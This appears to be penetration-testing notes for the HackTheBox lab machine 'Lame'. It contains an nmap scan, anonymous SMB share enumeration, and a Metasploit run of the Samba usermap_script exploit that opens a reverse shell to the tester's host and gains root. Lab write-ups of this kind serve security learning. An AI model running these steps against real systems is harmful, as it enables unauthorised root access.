# Meta data

IP: 10.129.174.121
Date accessed: 07/13/2021


# Enum

## Nmap 

`nmap -T4 -p- -A 10.129.174.121`

- Ports opened: 21,22,139,445,3632
- Services: OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), vsftpd 2.3.4, Ubuntu 4.2.4-1ubuntu4, Samba smbd 3.X, Samba smbd 3.0.20-Debian - 4.X, distccd v1 ((GNU) 4.2.4 
- Noticable: Anonymous FTP login allowed (FTP code 230)

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 18:16 EDT
Nmap scan report for 10.129.174.121
Host is up (0.13s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.117
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m40s, deviation: 2h49m45s, median: 37s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-07-13T18:19:19-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   128.00 ms 10.10.14.1
2   129.18 ms 10.129.174.121

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.68 seconds


```


## SMBClient
`smbclient -L \\\\10.129.174.121\\`

```
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

```

```
root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox# smbclient \\\\10.129.174.121\\tmp
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 13 18:30:20 2021
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  .ICE-unix                          DH        0  Tue Jul 13 18:13:26 2021
  vmware-root                        DR        0  Tue Jul 13 18:13:47 2021
  .X11-unix                          DH        0  Tue Jul 13 18:13:54 2021
  .X0-lock                           HR       11  Tue Jul 13 18:13:54 2021
  5593.jsvc_up                        R        0  Tue Jul 13 18:14:41 2021
  vgauthsvclog.txt.0                  R     1600  Tue Jul 13 18:13:23 2021

		7282168 blocks of size 1024. 5385888 blocks available
smb: \> 



```

use this 

```msf6 > use exploit/multi/samba/usermap_script

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.117:4444 
[*] Command shell session 1 opened (10.10.14.117:4444 -> 10.129.174.121:54188) at 2021-07-13 18:40:37 -0400

whoami
root

```

